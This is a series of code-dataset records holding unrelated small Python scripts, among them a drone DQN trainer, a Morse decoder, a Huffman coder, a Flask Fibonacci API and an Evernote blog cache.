rospy.Subscriber('/iitp_drone/camera_1/image_raw',Image, ImageCB)\n \n agent = DQNAgent(state_size, action_size)\n rospy.wait_for_service('/multi_setpoint_local')\n goto_agent_client = rospy.ServiceProxy('/multi_setpoint_local', srvMultiSetpointLocal)\n scores, episodes = [], []\n\n for e in range(EPISODES):\n done = False\n score = 0\n print(\"now_reset\")##필요없음\n state = env.reset()\n state = np.reshape(state, [1, state_size])#배열 reshape하는 코드 이후 맞는지 check 수정\n \n while not done:\n action = agent.get_action(state)#현재 state에 대한 action결과를 quad_action에 저장하고\n quad_action=interpret_action(action)\n \n #드론이 실제로 움직일 좌표\n quad_action_offset_x=quad_pose.pose.position.x+quad_action[0]\n quad_action_offset_y=quad_pose.pose.position.y+quad_action[1] \n quad_action_offset_z=quad_pose.pose.position.z+quad_action[2]\n \n goto_agent_client(\"POINT\",quad_action_offset_x,quad_action_offset_y,quad_action_offset_z)\n\n #드론 위치 이동시 실제 드론의 위치와 서비스 요청한 액션과의 비교 후 다음상태 받기\n #quad_pose다시 서브스크라이브후 quad_action_offset와 비교 \n while True:\n if ((abs(quad_pose.pose.position.x-quad_action_offset_x) 저장\n agent.append_sample(state, action, reward, next_state, done)\n # 매 타임스텝마다 학습\n if len(agent.memory) >= agent.train_start:\n agent.train_model()\n\n score += reward #score는 int scores는 리스트 형태\n state = next_state\n\n if done:\n #각 에피소드마다 타깃 모델을 모델의 가중치로 업데이트\n agent.update_target_model()\n\n # 에피소드마다 학습 결과 출력\n scores.append(score)\n episodes.append(e)\n pylab.plot(episodes, scores, 'b')\n pylab.savefig(\"/home/injae/catkin_ws/src/RSD/src/save_graph/selfie_drone_dqn.png\")\n print(\"episode:\", e, \" score:\", score, \" memory length:\",\n len(agent.memory), \" epsilon:\", agent.epsilon)\n\n #수정필요# 이전 10개 에피소드의 점수 평균이 490보다 크면 학습 중단 \n \n # if (np.mean(scores[-min(10, len(scores)):]) >1000 and (e>500)) :\n # agent.model.save_weights(\"/home/injae/catkin_ws/src/RSD/src/save_model/selfie_drone_dqn.h5\")\n # sys.exit()\n if (e==1000) :\n agent.model.save_weights(\"/home/injae/catkin_ws/src/RSD/src/save_model/selfie_drone_dqn_ep1000.h5\")\n pylab.savefig(\"/home/injae/catkin_ws/src/RSD/src/save_graph/selfie_drone_dqn_ep1000.png\")\n print('ep1000 saved')\n \n if (e==5000) :\n agent.model.save_weights(\"/home/injae/catkin_ws/src/RSD/src/save_model/selfie_drone_dqn_ep5000.h5\")\n pylab.savefig(\"/home/injae/catkin_ws/src/RSD/src/save_graph/selfie_drone_dqn_ep5000.png\")\n print('ep5000 saved')\n \n if (e==10000) :\n agent.model.save_weights(\"/home/injae/catkin_ws/src/RSD/src/save_model/selfie_drone_dqn_ep10000.h5\")\n pylab.savefig(\"/home/injae/catkin_ws/src/RSD/src/save_graph/selfie_drone_dqn_ep10000.png\")\n print('ep10000 saved')\n if (e==15000) :\n agent.model.save_weights(\"/home/injae/catkin_ws/src/RSD/src/save_model/selfie_drone_dqn_ep15000.h5\")\n pylab.savefig(\"/home/injae/catkin_ws/src/RSD/src/save_graph/selfie_drone_dqn_ep15000.png\")\n print('ep15000 saved')\n if (e==19999) :\n agent.model.save_weights(\"/home/injae/catkin_ws/src/RSD/src/save_model/selfie_drone_dqn_ep19999.h5\")\n pylab.savefig(\"/home/injae/catkin_ws/src/RSD/src/save_graph/selfie_drone_dqn_ep19999.png\")\n print('ep19999 saved,exit')\n sys.exit()\n\n \n \n # if np.mean(scores[-min(10, len(scores)):]) > 490:#+점수가 10점 한번이니까 리워드를 더주고 스코어로는 부족 그냥 리워드가 30 이상일떄 학습을 종료하는 건 어떰? \n # agent.model.save_weights(\"/home/injae/catkin_ws/src/people_detection/src/save_model/selfie_drone_dqn.h5\")\n # sys.exit()\n \n\n\n\n# 수정필요!! 지금 문제점 물체가 안잡혀서 리셋이 될때 사람이 디텍션 되면 리셋 위치가 아닌데도 디텍션을 해서 스텝을 진행\n","sub_path":"src/DQNAgent.py","file_name":"DQNAgent.py","file_ext":"py","file_size_in_byte":12795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"291076876","text":"\nimport torch\nimport numpy as np\n\ndata_file = '../data/demo_ts_spoon_sprial_setion.csv'\n\ndef load_demo():\n \n data = []\n\n ee_pos_data = np.loadtxt(open(data_file, \"rb\"), delimiter=\",\", skiprows=0)\n\n bias = np.mean(ee_pos_data, 0)\n std = np.std(ee_pos_data, 0)\n\n for k in range(ee_pos_data.shape[0]):\n datum = ee_pos_data[k,:]\n data.append(torch.tensor([ [ (datum[0]-bias[0])/std[0], (datum[1]-bias[1])/std[1] ] ]))\n\n return torch.stack(data)","sub_path":"examples/get_demo.py","file_name":"get_demo.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"241974371","text":"from gtnlplib.constants import OFFSET\nimport numpy as np\nimport torch\nimport operator\n# deliverable 6.1\ndef get_top_features_for_label_numpy(weights,label,k=5):\n '''\n Return the five features with the highest weight for a given label.\n\n :param weights: the weight dictionary\n :param label: the label you are interested in\n :returns: list of tuples of features and weights\n :rtype: list\n '''\n\n top_features = []\n\n filtered_weights = {pair : weight for pair, weight in weights.items() if pair[0] == label}\n\n for pair, weight in weights.items():\n if pair[0] == label:\n if len(top_features) < k:\n top_features.append((pair, weight))\n else:\n min_feature = min(top_features, key=lambda x:x[1])\n if weight > min_feature[1]:\n top_features = [(pair, weight) if x == min_feature else x for x in top_features]\n\n top_features.sort(key=operator.itemgetter(1), reverse=True)\n return top_features\n\n\n# deliverable 6.2\ndef get_top_features_for_label_torch(model,vocab,label_set,label,k=5):\n '''\n Return the five words with the highest weight for a given label.\n\n :param model: PyTorch model\n :param vocab: vocabulary used when features were converted\n :param label_set: set of ordered labels\n :param label: the label you are interested in \n :returns: list of words\n :rtype: list\n '''\n\n vocab = sorted(vocab)\n features = list(model.parameters())[0]\n\n label_dict = {}\n i = 0\n for l in label_set:\n label_dict[l] = i\n i = i + 1\n\n features = (list(model.parameters())[0][label_dict[label]].data.numpy())\n features = features.argsort()[-k:][::-1]\n ret = []\n for feat_i in features:\n ret.append(vocab[feat_i])\n\n return ret\n\n# deliverable 7.1\ndef get_token_type_ratio(counts):\n '''\n compute the ratio of tokens to types\n\n :param counts: bag of words feature for a song, as a numpy array\n :returns: ratio of tokens to types\n :rtype: float\n\n '''\n # print(counts)\n distinct = 0\n sum = 0\n for count in counts:\n if count != 0:\n distinct += 1\n sum += count\n if distinct != 0:\n return sum / distinct\n return 0\n\n# deliverable 7.2\ndef concat_ttr_binned_features(data):\n '''\n Discretize your token-type ratio feature into bins.\n Then concatenate your result to the variable data\n\n :param data: Bag of words features (e.g. X_tr)\n :returns: Concatenated feature array [Nx(V+7)]\n :rtype: numpy array\n\n '''\n num_bins = 7\n include_bins = []\n for row in data:\n # print(str(row.shape) + str(r))\n ratio = int(get_token_type_ratio(row))\n bins = np.asarray([1 if i == ratio else 0 for i in range(num_bins)])\n np.concatenate((row, bins), axis=0)\n new_row = np.append(row, bins)\n include_bins.append(new_row)\n return np.asarray(include_bins)\n\n\n","sub_path":"psets/ps1/gtnlplib/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"228822792","text":"import sys\nfrom PyQt5.QtWidgets import QApplication, QLabel, QMainWindow, QLineEdit, QAction, QHBoxLayout, QWidget, QPushButton, \\\n QVBoxLayout\nfrom PyQt5.QtCore import Qt\n\n\n# Subclass QMainWindow to customise your application's main window\nclass MainWindow(QMainWindow):\n\n def __init__(self, *args, **kwargs):\n super(MainWindow, self).__init__(*args, **kwargs)\n\n self.setWindowTitle(\"Conversion Tool.\")\n layouts = [QHBoxLayout() for x in range(3)]\n\n lbl_feet = QLabel(\"Feet\")\n self.edit_box = QLineEdit(\"Type a number here\")\n layouts[0].addWidget(lbl_feet)\n layouts[0].addWidget(self.edit_box)\n\n lbl_metres = QLabel(\"Metres\")\n self.lbl_answer = QLabel(\"...\")\n layouts[1].addWidget(lbl_metres)\n layouts[1].addWidget(self.lbl_answer)\n\n btn_go = QPushButton(\"Go\")\n btn_go.pressed.connect(lambda: self.do_convert(12))\n layouts[2].addWidget(btn_go, Qt.AlignRight)\n\n main_layout = QVBoxLayout()\n\n for layout in layouts:\n main_layout.addLayout(layout)\n\n\n # The `Qt` namespace has a lot of attributes to customise\n # widgets. See: http://doc.qt.io/qt-5/qt.html\n widget = QWidget()\n widget.setLayout(main_layout)\n\n # Set the central widget of the Window. Widget will expand\n # to take up all the space in the window by default.\n self.setCentralWidget(widget)\n\n def do_convert(self, n):\n print(\"Hellooo\")\n n = self.edit_box.text()\n if n.isnumeric():\n n = int(n) / 3\n self.lbl_answer.setText(str(n))\n else:\n self.lbl_answer.setText(\"XXX\")\n # self.lbl_answer.repaint()\n self.update()\n\n\napp = QApplication(sys.argv)\n\nwindow = MainWindow()\nwindow.show()\n\napp.exec_()\n","sub_path":"qt_testing/length_conversion.py","file_name":"length_conversion.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"623529916","text":"# coding=utf-8\n\nif __name__ == '__main__':\n print('Please input the number of students:')\n n = int(input())\n names, scores = [], []\n for i in range(n):\n print('Please input the name of student ' + str(i + 1))\n names.append(input())\n print('Please input the score of student ' + str(i + 1))\n scores.append(int(input()))\n\n print('Input:')\n for i in range(n):\n print(names[i], scores[i])\n\n for i in range(n):\n max_index = i\n for j in range(i + 1, n):\n if scores[j] > scores[max_index]:\n max_index = j\n\n scores[i], scores[max_index] = scores[max_index], scores[i]\n names[i], names[max_index] = names[max_index], names[i]\n\n print('Sorted:')\n for i in range(n):\n print(names[i], scores[i])","sub_path":"JiuZhang/Lecture2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"291243230","text":"# coding=utf-8\n\nimport time\nimport secret\n\nfrom datetime import datetime\nfrom evernote.edam.notestore import NoteStore\nfrom evernote.api.client import EvernoteClient\nfrom evernote.edam.limits import constants\n\n\nclass Post(object):\n \"\"\"A blog post's meta\n\n Attributes:\n title:\n created:\n updated:\n guid:\n tags:\n content:\n \"\"\"\n title = None\n guid = None\n tags = []\n created = None\n updated = None\n content = None\n\n def __init__(self, title=None, guid=None, tags=[],\n created=None, updated=None, content=None):\n self.title = title\n self.guid = guid\n self.tags = tags\n self.created = created\n self.updated = updated\n self.content = content\n\n def to_dic(self):\n time_fmt = \"%B %d, %Y\"\n return dict(\n title=self.title,\n tags=self.tags,\n created=datetime.utcfromtimestamp(self.created/1000).strftime(time_fmt),\n # updated=datetime.utcfromtimestamp(self.updated/1000).strftime(time_fmt),\n content=self.content\n )\n\n\nclass EvernoteCache(object):\n \"\"\"Cache evernote notes in published.\n\n 1. Evernote API wrapper\n 2. Cache notes\n\n Attributes:\n posts: To save post.\n tags: Tags in blog notebook.\n dates: To save archive dates.\n last_update: Last time the sync happend.\n auth_token: Evernote dev token.\n client: Evernote client.\n note_store: Operate object.\n blog_note_guid: The blog notebook's guid in evernote.\n published_tag_guid: The tag published's guid.\n filter: To filter published notes in blog notebook.\n spec: To get published notebook's metadata.\n \"\"\"\n posts = []\n tags = []\n dates = []\n\n def __init__(self):\n self.auth_token = secret.token\n self.client = EvernoteClient(token=self.auth_token, sandbox=False)\n self.note_store = self.client.get_note_store()\n\n # Get notebook: blog's guid\n notebooks = self.note_store.listNotebooks(self.auth_token)\n self.blog_notebook_guid = [notebook.guid for notebook in notebooks\n if notebook.name == \"blog\"][0]\n\n # Get tag: published's guid\n all_tags = self.note_store.listTags(self.auth_token)\n self.published_tag_guid = [tag.guid for tag in all_tags\n if tag.name == \"Published\"][0]\n\n # Create filter in blog notebook\n self.filter = NoteStore.NoteFilter()\n self.filter.ascending = False\n self.filter.tagGuids = [self.published_tag_guid]\n self.filter.notebookGuid = self.blog_notebook_guid\n\n # Create note result scpecification\n self.spec = NoteStore.NotesMetadataResultSpec()\n self.spec.includeTitle = True\n self.spec.includeTagGuids = True\n self.spec.includeUpdated = True\n self.spec.includeCreated = True\n self.spec.includeDeleted = True\n self.spec.includeUpdateSequenceNum = True\n\n # Init last update time\n self.last_update = 0\n # Init notebook's update sequence num\n self.usn = 0\n self.sync()\n\n def update_time(self):\n self.last_update = int(time.time())\n\n def parse_enml(self, enml):\n \"\"\"Convert ENML to HTML\"\"\"\n # First delete xml declaration\n # TODO: Finish it, no idea\n pass\n\n def prepare_store(self):\n # Update tags\n tags = self.note_store.listTagsByNotebook(self.auth_token, self.blog_notebook_guid)\n self.tags = [{\"guid\": tag.guid, \"name\": tag.name} for tag in tags]\n\n notes = self.note_store.findNotesMetadata(self.auth_token, self.filter,\n 0, constants.EDAM_USER_NOTES_MAX, self.spec)\n self.posts = []\n for note in notes.notes:\n tag_names = self.note_store.getNoteTagNames(self.auth_token, note.guid)\n # TODO: Compile ENML\n note_content = self.note_store.getNoteContent(self.auth_token, note.guid)\n post = Post(note.title, note.guid, tag_names, note.created,\n note.updated, note_content)\n self.posts.append(post)\n # Sort by created time\n self.posts.sort(key=lambda curr_post: curr_post.created, reverse=True)\n\n def sync(self):\n \"\"\"Sync between server cache and evernote\n\n Cache consists of notes, tags.\n \"\"\"\n time_now = int(time.time())\n # Check sync one time per 15min\n if time_now - self.last_update < 10:\n return\n # Check if there are new content\n sync_state = self.note_store.getSyncState(self.auth_token)\n curr_usn = sync_state.updateCount\n if curr_usn <= self.usn:\n return\n self.usn = curr_usn\n\n self.prepare_store()\n self.update_time()\n\n def get_posts(self):\n return [post.to_dic() for post in self.posts]\n\n def get_tags(self):\n return [tag[\"name\"] for tag in self.tags]\n\n def get_last_update(self):\n return datetime.fromtimestamp(self.last_update).strftime(\"%Y-%m-%d %H:%M:%S\")\n\n\ndef test():\n cache = EvernoteCache()\n\n\nif __name__ == \"__main__\":\n test()\n","sub_path":"backup-to-evernote/blog/memcache.py","file_name":"memcache.py","file_ext":"py","file_size_in_byte":5258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"397341144","text":"# exercise 3\r\n\r\nimport sys\r\nfrom pymongo import MongoClient\r\nfrom pprint import pprint\r\n\r\nif __name__ == \"__main__\":\r\n client = MongoClient()\r\n db = client.lab5\r\n pokedex = db.pokedex\r\n\r\n wind_pokemon = []\r\n wind_weak = []\r\n\r\n # get Baram's pokemons\r\n for i in range(1,len(sys.argv)):\r\n wind_pokemon.append(sys.argv[i])\r\n\r\n # weaknesses of Baram's pokemons\r\n for w in wind_pokemon:\r\n wind_weak.append(pokedex.find_one({'name':w})['weaknesses'])\r\n\r\n # intersection of weaknesses\r\n weak_type = set(wind_weak[0])\r\n for w in wind_weak[1:]:\r\n weak_type = weak_type & set(w)\r\n\r\n weak_type = list(weak_type)\r\n\r\n for candidate in pokedex.find(\r\n {'type' : {'$in' : weak_type}},\r\n {'_id':0, 'id':1, 'name':1, 'type':1}).sort('name'):\r\n\r\n pprint(candidate)\r\n","sub_path":"BDE4/lab/lab05/advice/exercise5-3.py","file_name":"exercise5-3.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"468493107","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport heapq\n\nclass HeapNode():\n def __init__(self, char, freq):\n self.char = char\n self.freq = freq\n self.left = None\n self.right = None\n \n \n def __cmp__(self, other):\n if(other == None):\n return -1\n if(isinstance(other, HeapNode)):\n return -1\n return self.freq > other.freq\n \n \n def __lt__(self, other):\n return self.freq < other.freq\n\n def __eq__(self, other):\n if(other == None):\n return False\n if(not isinstance(other, HeapNode)):\n return False\n return self.freq == other.freq\n \ndef heapCoding(root,currentCode,codes,reverse):\n if (root == None):\n return\n\n if(root.char!=None):\n codes[root.char]= currentCode\n reverse[currentCode]=root.char\n\n heapCoding(root.left,currentCode + \"0\",codes,reverse)\n heapCoding(root.right,currentCode + \"1\",codes,reverse) \n\ndef main():\n #read from file\n f=open(\"Huffman.txt\", \"r\");\n if f.mode == 'r':\n text =f.read();\n #print(text);\n count = {};\n #get count for all char\n for x in text:\n if x in count.keys():\n count[x]+= 1\n else:\n count[x] = 1\n \n total = sum(count.values());\n #get freq\n for value in count.keys():\n count[value] = count[value]/total;\n #print(count)\n \n list1 = []\n heapq.heapify(list1)\n \n #creating heap\n for key in count:\n node = HeapNode(key, count[key])\n heapq.heappush(list1 ,node)\n \n #sorting it \n while(len(list1)>1):\n node1 = heapq.heappop(list1)\n node2 = heapq.heappop(list1)\n merged = HeapNode(None, node1.freq + node2.freq)\n merged.left = node1\n merged.right = node2\n heapq.heappush(list1, merged)\n \n root =heapq.heappop(list1) \n # Encode the read text\n currentCode =\"\";\n codes={};\n reverse={};\n heapCoding(root,currentCode,codes,reverse);\n \n encoded_text =\"\"\n for character in text:\n encoded_text += codes[character]\n \n #print(encoded_text)\n #Decode the encoded text\n code=\"\"\n decode_text=\"\"\n for bit in encoded_text:\n code +=bit\n if(code in reverse):\n character =reverse[code]\n decode_text +=character\n code = \"\"\n file1 = open(\"result.txt\",\"w\") \n file1.write(decode_text)\n file1.close()\n\nmain()\n","sub_path":"huffman_code.py","file_name":"huffman_code.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"444429105","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\ndef zero(c):\n return c == '0'\n\ndef one(c):\n return c == '1'\n\ndef space(c):\n return c == ' '\n\ndef nspace(c):\n return c != ' '\n\ndef dropWhile(pred, s):\n k = 0\n for c in s:\n if pred(c):\n k += 1\n else:\n break\n return s[k:]\n\ndef dropEndWhile(pred, s):\n k = 0\n for i in range(len(s)-1, 0, -1):\n if pred(s[i]):\n k += 1\n else:\n break\n return s[0:len(s)-k]\n\ndef takeDropWhile(pred, s):\n if s == None or len(s) == 0:\n return '', ''\n l, k = '', 0\n for c in s:\n if pred(c):\n l += c\n k += 1\n else:\n break\n return l, s[k:]\n\n\n# \"Dot\" – is 1 time unit long.\n# \"Dash\" – is 3 time units long.\n# Pause between dots and dashes in a character – is 1 time unit long.\n# Pause between characters inside a word – is 3 time units long.\n# Pause between words – is 7 time units long.\n\ndef decodeBitsImpl(bits):\n if bits == None or len(bits) == 0:\n return \"\"\n else:\n if bits[0] == '0':\n l, r = takeDropWhile(zero, bits)\n ll = len(l)\n if ll == 1:\n return decodeBitsImpl(r)\n elif ll == 3:\n return ' ' + decodeBitsImpl(r)\n elif ll == 7:\n return ' ' + decodeBitsImpl(r)\n else:\n l, r = takeDropWhile(one, bits)\n ll = len(l)\n if ll == 1:\n return '.' + decodeBitsImpl(r)\n elif ll == 3:\n return '-' + decodeBitsImpl(r)\n\ndef detectFreq(bits):\n if bits == '':\n return 65535\n else:\n if bits[0] == '0':\n l, r = takeDropWhile(zero, bits)\n return min(len(l), detectFreq(r))\n else:\n l, r = takeDropWhile(one, bits)\n return min(len(l), detectFreq(r))\n\ndef decodeBits(bits):\n # ToDo: Accept 0's and 1's, return dots, dashes and spaces\n bits_ = ''\n bits = dropEndWhile(zero, dropWhile(zero, bits))\n freq = detectFreq(bits)\n if freq == 65535:\n freq = 1\n for i in range(0, len(bits), freq):\n bits_ += bits[i]\n return decodeBitsImpl(bits_)\n\ndef decodeMorse(morseCode):\n if morseCode == None or len(morseCode) == 0:\n return ''\n else:\n if space(morseCode[0]):\n l, r = takeDropWhile(space, morseCode)\n if len(l) == 3:\n return ' ' + decodeMorse(r)\n else:\n return decodeMorse(r)\n else:\n l, r = takeDropWhile(nspace, morseCode)\n return MORSE_CODE[l] + decodeMorse(r)\n\n\n\ns = '1100110011001100000011000000111111001100111111001111110000000000000011001111110011111100111111000000110011001111110000001111110011001100000011'\n\nif __name__ == '__main__':\n x = decodeBits('000000011100000')\n print(x)\n print(decodeMorse(s))\n\n","sub_path":"Codewars/4kyu/decode-the-morse-code-advanced.py","file_name":"decode-the-morse-code-advanced.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"605851766","text":"import sys\r\nimport numpy as np\r\nfrom eofs.standard import Eof\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n\r\n\r\nnp.set_printoptions(formatter = {'float_kind':lambda x: \"{0:0.3f}\".format(x)},threshold=20000000)\r\n\r\n# Q1\r\n########################### INPUT DATA ################################\r\nx = np.arange(-50,51,1)\r\nt = np.arange(1,1001,1)\r\neta_coord = []\r\neta_2D = [0 for i in range(len(x))]\r\n\r\nfor i in range(len(x)):\r\n stat = [0 for i in range(len(t))]\r\n for j in range(len(t)):\r\n X = x[i]\r\n T = t[j]\r\n # eta(x, t) = (1 / 50)xcos(2pit / 100) + (1 / 500)xcos(2pit / 10)\r\n eta_ij = (1/50) * X * np.cos((2 * np.pi * T)/100) + (1/500) * X* np.cos((2 * np.pi * T)/10)\r\n stat[j] = eta_ij\r\n eta_2D[i]= stat\r\n\r\neta = np.array(eta_2D)\r\n#print (\"+\" * 20 + \" GIVEN MATRIX \" + \"+\"*20)\r\n#print (eta)\r\n#print (\"+\" * 20 + \" MATRIX DIMENSION\" + \"+\"*20)\r\n#print (np.shape(eta))\r\n#print (np.ndim(eta))\r\n\r\n\r\nU, S, V = np.linalg.svd(eta)\r\nVt = np.transpose(V)\r\nsv = np.matmul(S,Vt)\r\nUt = np.tranpose(U)\r\nA = np.matmup(U)\r\neta_t = np.transpose(eta)\r\ncovar = np.matmul(eta,eta_t)\r\neval , evec = np.linalg.eigh(covar)\r\nevec_t = np.transpose(evec)\r\npc = np.matmul(evec_t,eta)\r\n\r\nprint(pc)\r\n\r\nprint (\"+\" * 20 + \" U: Spatial Singular Vectors \" + \"+\"*20)\r\nprint (U)\r\n\r\n\r\nprint (\"+\" * 20 + \" V: Singular Value Matrix \" + \"+\"*20)\r\n\r\n","sub_path":"week3/Q1-2.py","file_name":"Q1-2.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"234190711","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Dec 3 10:54:22 2018\r\nThis function checks whether bbox is inside the rectangle region.\r\n@author: soumya.doddagoudar\r\n\"\"\"\r\nimport cv2\r\nimport numpy as np\r\n\r\ndef point_poylgontest(Roi_bbox,coord):\r\n #centroid=object_bbox[:,2]-(object_bbox[2:]-object_bbox[:,2])/2\r\n centroid = ((coord[0]+coord[2])/2, (coord[1]+coord[3])/2)\r\n print(centroid)\r\n left=Roi_bbox[0]\r\n top=Roi_bbox[1]\r\n right=Roi_bbox[0]+Roi_bbox[2]\r\n bottom=Roi_bbox[3]+Roi_bbox[1]\r\n cnt=[[left,top],[Roi_bbox[0]+Roi_bbox[2],top],[right,bottom],[left,bottom]]\r\n cnt=np.array(cnt)\r\n dist = cv2.pointPolygonTest(cnt,(centroid[0],centroid[1]),False)\r\n print(dist)\r\n if dist == 1:\r\n print(\"point is inside contour\" )\r\n elif dist==-1:\r\n print(\"point is outside contour\")\r\n elif dist==0:\r\n print(\"point is on contour\")\r\n \r\n #point is inside or outside or on the contour (it returns +1, -1, 0 respectively). \r\nRoi_bbox=[235,85,501-235,233-85] \r\ncoord=(259,147,290,192) \r\n\r\n\r\npoint_poylgontest(Roi_bbox,coord)\r\n#ROI_bbox-rectangle region --- x,y,w,h(top,left,width,height)\r\n#coord-object/boundingbox coordinates ------(top,left,bottom,right)\r\n","sub_path":"polygontest_bbox_centroids.py","file_name":"polygontest_bbox_centroids.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"262372200","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Apr 27 18:54:52 2020\r\n\r\n@author: amoth\r\n\"\"\"\r\n\r\ndef smallest_multiple(start, end):\r\n smal_mult = 0\r\n test = end\r\n while smal_mult == 0:\r\n count_multiples = 0\r\n for i in range(start, end+1):\r\n if (test%i) == 0:\r\n count_multiples += 1 \r\n if count_multiples == (end-start+1):\r\n smal_mult = test\r\n else:\r\n test += end\r\n return smal_mult\r\n\r\n\r\nprint(smallest_multiple(1, 20))\r\n","sub_path":"euler_5.py","file_name":"euler_5.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"539527838","text":"import numpy as np\n\n\ndef get_parent_from_neuron(file_name):\n\tparent = [[float(i) for i in line.split()] for line in open(file_name)]\n\tmax_length = 0\n\tfor l in parent:\n\t\tif len(l) > max_length:\n\t\t\tmax_length = len(l)\n\tfor i in range(len(parent)):\n\t\tparent[i] = np.lib.pad(parent[i], (0, max_length - len(parent[i])), 'constant', constant_values=(0,0))\n\tparent = np.array(parent)\n\trows, cols = parent.shape\n\tparent = parent[1:rows - 1] + 1\n\tparent = parent[:,1].T\n\tparent[0] = 0\n\treturn parent","sub_path":"NeuroGPU_Base/scripts/template/get_parent_from_neuron.py","file_name":"get_parent_from_neuron.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"415638523","text":"n=int(input(\"enter the integer:\"))\nrev=0\noriginal=n\nwhile(n!=0):\n rem=n%10\n rev=rev*10+rem\n n//=10\nif(original==rev):\n print(rev,\"is palindrome\")\nelse:\n print(rev,\"is not palindrome\")","sub_path":"pythonprograms/practice/importmodules/assingmnt/fib/palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"165094396","text":"\"\"\"\n.. include:: ../README.md\n\n.. include:: ../regression_example.md\n\"\"\"\nREGRESSION = 'regression'\nCLASSIFICATION = 'classification'\n\nfrom laplace.baselaplace import BaseLaplace, ParametricLaplace, FullLaplace, KronLaplace, DiagLaplace\nfrom laplace.lllaplace import LLLaplace, FullLLLaplace, KronLLLaplace, DiagLLLaplace\nfrom laplace.laplace import Laplace\n\n__all__ = ['Laplace', # direct access to all Laplace classes via unified interface\n 'BaseLaplace', 'ParametricLaplace', # base-class and its (first-level) subclasses\n 'FullLaplace', 'KronLaplace', 'DiagLaplace', # all-weights\n 'LLLaplace', # base-class last-layer\n 'FullLLLaplace', 'KronLLLaplace', 'DiagLLLaplace'] # last-layer\n","sub_path":"laplace/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"626534192","text":"#!flask/bin/python\n\n\"\"\"\nThis is the actual API to listen for requests.\n\nThis simply needs to be run in order to begin the listen state.\nDefault port is 5000, so ensure it's open in the firewall.\n\"\"\"\n\n\nfrom flask import Flask, jsonify\nfrom fibo import restfib\n\napi = Flask(__name__)\n\n\n@api.route('/')\ndef index():\n return \"The Fibonacci sequence API.\\nSend POST/GET to /fibo/api/v1.0/\\n\"\n\n@api.route('/fibo/api/v1.0/', methods=['POST', 'GET'])\ndef do_return():\n return jsonify(\n {\"result\": {\"Error01\": \"You must submit a whole number!\"}})\n\n@api.route('/fibo/api/v1.0/', methods=['POST', 'GET'])\ndef do_fibo(steps):\n try:\n steps = int(steps)\n except ValueError:\n return jsonify(\n {\"result\": {\"Error01\": \"You must submit a whole number!\"}})\n\n obj = restfib()\n result = obj.san_number(steps)\n if result is True:\n result = obj.make_list(steps)\n return jsonify({'result': result})\n\nif __name__ == '__main__':\n api.run(host='0.0.0.0')\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"198495884","text":"# Added Missile actor\r\n# Handle space key\r\n# Draw Missle\r\n# Move Missile\r\n# When off the top, stop drawing (so can be shot again)\r\n\r\nWIDTH = 500\r\nHEIGHT = 500\r\n\r\nship = Actor('ship')\r\nship.midbottom = 250,490\r\n\r\nmissile = Actor('missile')\r\nmissile.fired = False\r\n\r\n\r\ndef update():\r\n\tif keyboard[keys.LEFT] and ship.left > 0:\r\n\t\tship.left -= 2\r\n\tif keyboard[keys.RIGHT] and ship.right < WIDTH:\r\n\t\tship.right += 2\r\n\tif keyboard[keys.SPACE] and not missile.fired:\r\n\t\tmissile.fired = True\r\n\t\tmissile.pos = ship.midtop\r\n\r\n\tif missile.fired:\r\n\t\tmissile.top -= 5\r\n\t\tif missile.bottom < 0:\r\n\t\t\tmissile.fired = False\r\n\r\n\r\ndef draw():\r\n\tscreen.clear()\r\n\tship.draw()\r\n\tif missile.fired:\r\n\t\tmissile.draw()\r\n\r\n","sub_path":"step2-1.py","file_name":"step2-1.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"567157907","text":"import peslearn\n\ninput_string = (\"\"\"\n O \n H 1 r1\n H 1 r2 2 a2 \n \n r1 = [0.85,1.20, 5]\n r2 = [0.85,1.20, 5]\n a2 = [90.0,120.0, 5]\n\n energy = 